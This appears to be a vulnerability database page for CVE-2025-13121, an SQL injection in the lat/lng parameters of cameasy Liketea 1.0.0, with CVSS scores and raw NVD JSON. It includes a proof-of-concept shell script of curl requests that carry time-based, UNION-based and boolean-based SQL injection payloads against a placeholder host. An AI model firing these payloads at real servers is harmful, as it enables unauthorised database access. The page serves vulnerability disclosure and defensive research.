Security Vulnerability Report
中文
CVE-2025-13121 CVSS 7.3 HIGH

CVE-2025-13121

Published: 2025-11-13 17:15:45
Last Modified: 2026-04-29 01:00:02

Description

A security vulnerability has been detected in cameasy Liketea 1.0.0. Impacted is the function list of the file laravel/app/Http/Controllers/Front/StoreController.php of the component API Endpoint. Such manipulation of the argument lng/lat leads to sql injection. The attack may be performed from remote. The exploit has been disclosed publicly and may be used.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

cameasy Liketea 1.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/bin/bash # CVE-2025-13121 SQL Injection PoC for cameasy Liketea 1.0.0 # Target: StoreController.php API Endpoint TARGET_URL="http://target.com/api/endpoint" # SQL Injection using time-based blind injection in lat parameter echo "[*] Testing CVE-2025-13121 SQL Injection..." # Basic injection test - check for SQL error response curl -s -X GET "${TARGET_URL}?lat=1' AND SLEEP(5)--" \ -H "Content-Type: application/json" \ -w "\nResponse Time: %{time_total}s\n" # UNION-based injection to extract database version echo "[*] Extracting database version..." curl -s -X GET "${TARGET_URL}?lat=1' UNION SELECT NULL,@@version,NULL--" \ -H "Content-Type: application/json" # Extract database name echo "[*] Extracting database name..." curl -s -X GET "${TARGET_URL}?lat=1' UNION SELECT NULL,database(),NULL--" \ -H "Content-Type: application/json" # Boolean-based blind injection for data extraction echo "[*] Testing boolean-based blind injection..." curl -s -X GET "${TARGET_URL}?lat=1' AND 1=1--" \ -H "Content-Type: application/json" curl -s -X GET "${TARGET_URL}?lat=1' AND 1=2--" \ -H "Content-Type: application/json" echo "[*] PoC completed. Check responses for SQL injection indicators."

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13121", "sourceIdentifier": "[email protected]", "published": "2025-11-13T17:15:45.180", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in cameasy Liketea 1.0.0. Impacted is the function list of the file laravel/app/Http/Controllers/Front/StoreController.php of the component API Endpoint. Such manipulation of the argument lng/lat leads to sql injection. The attack may be performed from remote. The exploit has been disclosed publicly and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/ictrun/liketea-sql-injection/blob/main/README.md", "source": "[email protected]"}, {"url": "https://github.com/ictrun/liketea-sql-injection/blob/main/README.md#proof-of-concept", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.332349", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.332349", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.683659", "source": "[email protected]"}]}}